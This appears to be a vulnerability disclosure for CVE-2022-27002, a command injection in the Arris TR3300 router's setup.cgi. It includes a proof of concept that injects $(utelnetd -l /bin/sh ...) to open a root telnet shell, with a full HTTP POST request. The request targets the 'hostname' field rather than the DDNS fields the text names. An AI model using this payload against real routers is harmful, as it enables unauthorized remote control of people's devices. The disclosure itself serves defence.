Headline

CVE-2022-27002: my_vuln/10.md at main · wudipjq/my_vuln

Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

2 years ago

CVE

Open in Source

#vulnerability #web #mac #ubuntu #linux #git

ARRIS Vulnerability

Vendor:ARRIS

Product:TR3300

Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In setup.cgi binary:

In the router’s ddns function(ddns.html), ddns_name、ddns_pwd、h_ddns、ddns_host is directly passed by the attacker, so we can control the ddns_name、ddns_pwd、h_ddns、ddns_host to attack the OS.

First, accept and process the content of the field(ddns_user_name、ddns_password、ddns_service_provider、ddns_host_name), and then call the function nvram_set to store this input.

In rc_apps binary:

Eventually, in sub_41E880 function, the initial input will be extracted and cause command injection.

Supplement

BUT!!!

When receiving user input, there are very strict checks. But we can use $() to bypass it!

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set ddns_name as $(/usr/sbin/utelnetd -l /bin/sh -p 10002), and the router will excute it,such as:

POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 378 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wan_dyna.html Upgrade-Insecure-Requests: 1

dhcpc_enable=&hostname=$(/usr/sbin/utelnetd -l /bin/sh -p 9999)&dyna_mtu=1500&itsbutton1=Apply&webpage=wan_dyna.html&action=Apply&wan_access=eth1&wan_proto=dhcp&et1macaddr=00%3A30%3ABD%3AF6%3AEE%3A94&m_wan_hostname=TR3300&m_autodns=1&pppoe_autodns=1&dhcp_autodns=1&m_wan_aliasip=&todo=save&h_dhcpc_enable=enable&todo=save&this_file=wan_dyna.html&next_file=wan_dyna.html&message=